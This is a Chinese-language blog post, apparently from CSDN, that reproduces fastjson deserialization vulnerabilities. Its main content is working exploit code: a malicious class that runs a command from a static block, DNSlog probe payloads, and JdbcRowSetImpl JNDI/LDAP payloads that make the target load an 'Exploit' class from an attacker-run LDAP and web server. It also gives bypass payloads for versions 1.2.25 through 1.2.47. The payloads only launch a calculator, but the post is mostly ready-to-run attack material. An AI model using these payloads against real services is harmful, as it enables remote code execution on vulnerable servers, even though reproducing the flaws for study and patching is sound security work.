fastjson反序列化漏洞

最新推荐文章于 2023-09-18 16:33:37 发布
最新推荐文章于 2023-09-18 16:33:37 发布
阅读量6.9k 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127955987
版权

1.fastjson反序列化漏洞原理

我们知道fastjson在进⾏反序列化时会调⽤⽬标对象的构造,setter,getter等⽅法,如果这些⽅法内部 进⾏了⼀些危险的操作时,那么fastjson在进⾏反序列化时就有可能会触发漏洞。 我们通过⼀个简单的案例来说明fastjson反序列化漏洞原理。

package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.serializer.SerializerFeature;
import java.io.IOException;
//定义⼀个恶意类TestTempletaHello
class TestTempletaHello {
    static {
        try {
            Runtime.getRuntime().exec("calc");
       } catch (IOException e) {
            e.printStackTrace();
       }
   }
}
public class FastjsonTest2 {
    public static void main(String[] args) {
        //创建恶意类的实例并转换成json字符串
        TestTempletaHello testTempletaHello = new TestTempletaHello();
        String jsonString = JSON.toJSONString(testTempletaHello,
SerializerFeature.WriteClassName);
        System.out.println(jsonString);
        //将json字符串转换成对象
        Object obj = JSON.parse(jsonString);
        System.out.println(obj);
   }
}

在这个示例程序中先是构造了⼀个恶意类,然后调⽤toJSONString⽅法序列化对象写⼊@type,将 @type指定为⼀个恶意的类TestTempletaHello的类全名,当调⽤parse⽅法对TestTempletaHello类进⾏ 反序列化时,会调⽤恶意类的构造⽅法创建实例对象,因此恶意类TestTempletaHello中的静态代码块中 就会被执⾏。 执⾏结果如下:

 

2.fastjson1.2.24漏洞复现

2.1dnslog检测是否存在漏洞

可以使⽤dnslog ceye 等dnslog平台进⾏漏洞测试

package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
public class FastTest {
    public static void main(String[] args) {
        String json1="{\"zeo\":
{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.fooe50.ceye.io\"}}";
        JSONObject jsonObject= JSON.parseObject(json1);
   }
}

 

1.2.67版本后payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
畸形:
{"@type":"java.net.InetSocketAddress"{"address":,"val":"这⾥是dnslog"}}

3.Fastjson<1.2.24远程代码执⾏(CNVD-2017-02833 )

漏洞详情

fastjson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法 来访问属性。通过查找代码中相关的⽅法,即可构造出⼀些恶意利⽤链。

漏洞版本

fastjson <=1.2.24

漏洞利⽤

编写exp类

public class Exploit {
    static {
        try{
            String[] commands = {"calc"};
            Process pc=Runtime.getRuntime().exec(commands);
            pc.waitFor();
       }catch (Exception e){
            e.printStackTrace();
       }
   }
}

将编译好的放在服务器上 记得开启开web服务 在kali上可以使⽤

sudo python -m http.server 80

在kali上 marshalsec-0.0.3-SNAPSHOT-all开启jndi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
http://192.168.1.53:80/#Exploit 6666

在⽬标上执⾏

package sec;
import com.alibaba.fastjson.JSON;
public class FastjsonTest4 {
    public static void main(String[] args) {
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",
\"dataSourceName\":\"ldap://192.168.1.53:6666/Exploit\",
\"autoCommit\":true}";
        JSON.parse(PoC);
   }
}

成功弹出计算器,注意防火墙的问题

JdbcRowSetImpl利⽤链POC

RMI利⽤的JDK版本≤ JDK 6u132、7u122、8u113

LADP利⽤JDK版本≤ 6u211 、7u201、8u191

1.2.25-1.2.41 绕过

修复改动

1.⾃从1.2.25 起 autotype 默认为False

2.增加 checkAutoType ⽅法,在该⽅法中进⾏⿊名单校验,同时增加⽩名单机制Fastjson AutoType说 明

package com.nice0e3;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class POC {
    public static void main(String[] args) {
       ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String PoC = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",
\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",
\"autoCommit\":true}";
        JSON.parse(PoC);
   }
}

1.2.42绕过

1.2.42 修复⽅式 修复改动:明⽂⿊名单改为HASH值, checkcheckAutoType ⽅法添加 L 和 ; 字符过滤

package com.nice0e3;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class POC {
    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String PoC = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",
\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",
\"autoCommit\":true}";
        JSON.parse(PoC);
   }
}

1.2.25-1.2.47通杀

为什么说这⾥标注为通杀呢,其实这⾥和前⾯的绕过⽅式不太⼀样,这⾥是可以直接绕过 AutoTypeSupport ,即便关闭 AutoTypeSupport 也能直接执⾏成功。。

package sec;
import com.alibaba.fastjson.JSON;
public class FastTestpoc {
        public static void main(String[] args) {
            String PoC = "{\n" +                "    \"a\":{\n" +        
       "        \"@type\":\"java.lang.Class\",\n" +                "    
   \"val\":\"com.sun.rowset.JdbcRowSetImpl\"\n" +                "  
},\n" +                "    \"b\":{\n" +                "      
\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\n" +                "      
\"dataSourceName\":\"ldap://localhost:1389/badNameClass\",\n" +        
       "        \"autoCommit\":true\n" +                "    }\n" +      
         "}";
            System.out.println(PoC);
            JSON.parse(PoC);
       }
}
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
   },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
   }
}

 

人心中混沌必有,才能孕育出星辰
夜yesec
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3668
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
java代码审计之fastjson反序列化漏洞
最新发布
CheatMyself的博客
05-30 921
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3051
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
网络安全深入学习第七课——热门框架漏洞(RCE— Fastjson反序列化漏洞
p36273的博客
09-18 1673
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
【java安全FastJson反序列化漏洞浅析
leekos的博客,分享web安全相关知识~
08-24 1591
前面我们学习了RMI和JNDI知识,接下来我们就可以来了解一下FastJson反序列化FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以将JSON字符串反序列化到JavaBean。
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
FastJsonPoc.zip
07-05
描述中提到,这个压缩包包含了利用Fastjson反序列化漏洞的详细步骤和注释,旨在帮助用户深入理解该漏洞的工作原理和如何进行测试。通过下载并导入这些代码,研究人员或安全专家可以复现漏洞,进行漏洞分析、防护策略...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
然而,Fastjson 1.2.69 版本存在一个严重的反序列化远程代码执行漏洞,这使得攻击者有可能通过精心构造的输入数据,绕过防御机制,执行任意远程代码,对服务器的安全构成重大威胁。 **漏洞原理** Fastjson 在处理 ...
fastjson漏洞环境
01-12
在给定的“fastjson漏洞环境”中,我们关注的是三个特定版本的 Fastjson 反序列化漏洞:1.2.67、1.2.66 和 1.2.62。 **一、Fastjson 反序列化漏洞** 1. **什么是反序列化漏洞?** 反序列化是将已序列化的数据恢复...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
2. **安全编码实践**:在开发过程中遵循安全编码原则,避免直接将不受信任的输入数据反序列化为可执行对象。 3. **安全测试**:在项目上线前进行安全测试,包括但不限于渗透测试,查找并修复潜在的安全问题。 4. **...
FastJson 漏洞.md
05-27
FastJson 漏洞.md
fastjson反序列化漏洞fastjson-1.2.47)
zyer
04-28 4000
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
Fastjson反序列化漏洞
Massimo__JAVA的博客
07-16 880
Fastjson是一款广泛应用于Java开发的JSON解析库,它提供了高效、方便、安全的序列化和反序列化功能。通过对Fastjson漏洞的研究,发现在其默认配置下,Fastjson存在高危漏洞,攻击者可以利用该漏洞执行任意代码,从而实现远程代码执行攻击。
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4401
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全反序列化操作,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值